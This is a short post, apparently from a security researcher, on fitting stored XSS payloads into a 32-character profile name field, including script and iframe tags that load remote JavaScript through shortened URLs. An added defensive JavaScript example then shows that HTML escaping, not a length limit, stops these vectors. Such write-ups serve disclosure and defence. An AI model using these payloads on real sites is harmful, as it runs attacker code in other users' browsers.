A well-known website had a limit of 32 chars on the user name field that was reflected in the public profile area.
That field allowed XSS exploitation:
d<img src=x onerror=prompt(1)>
Simple right?
But sometimes you need to provide a better vector, where the affected company can see more than a prompt with a number. They also already know that their text field is limited to 32 chars.
I found two methods using SCRIPT and IFRAME.
When I was trying this with a tiny URL [is.gd] pointing to my XSS code at davidsopas.com, I realized that the vector wasn't executing.
Why? It required HTTPS.
I searched for a URL shortener that provided HTTPS, and Google provided me with one: goo.gl.
So my final vector was:
<script src=//goo.gl/TJnzmV> <iframe src=//goo.gl/xWYG4f>
29 chars, and I could use any JavaScript I wanted.
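The lesson for the defending side is that a length limit is not an XSS control: every vector quoted above fits in 32 chars, and only contextual output encoding of the profile field neutralizes them. The following is an added example (not code from the post or the affected site) that checks the post's own vectors against a length-only check and against HTML escaping; the rendering functions are assumed stand-ins for the site's profile template.

```javascript
// Added example: compare a length-only check with HTML output encoding,
// using the vectors quoted in the post as constructed sample input.
const MAX_NAME_LEN = 32; // the profile field's limit from the post

// Escape the characters that can break out of an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The only check the site in the story effectively had: length.
function acceptsByLengthOnly(name) {
  return name.length <= MAX_NAME_LEN;
}

// Hypothetical profile template rendered two ways: raw interpolation
// (vulnerable) and with output encoding (fixed).
function renderProfileUnsafe(name) {
  return '<h1>' + name + '</h1>';
}
function renderProfileSafe(name) {
  return '<h1>' + escapeHtml(name) + '</h1>';
}

// A name that still contains a raw '<' after encoding can open a tag.
function userControlledMarkup(renderedHtml, name) {
  const inner = renderedHtml.slice('<h1>'.length, -'</h1>'.length);
  return inner.includes('<') || inner.includes('>') ? inner !== escapeHtml(name) : false;
}

// Vectors from the post (constructed sample input for this example).
const vectors = [
  'd<img src=x onerror=prompt(1)>',
  '<script src=//goo.gl/TJnzmV>',
  '<iframe src=//goo.gl/xWYG4f>',
];

// Summarize, per vector, what each control achieves.
function evaluate(name) {
  return {
    passesLengthCheck: acceptsByLengthOnly(name),
    unsafeInjectsMarkup: userControlledMarkup(renderProfileUnsafe(name), name),
    safeInjectsMarkup: userControlledMarkup(renderProfileSafe(name), name),
  };
}

for (const v of vectors) console.log(v, evaluate(v));
```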
It was fun!
You guys have any other method you like to share?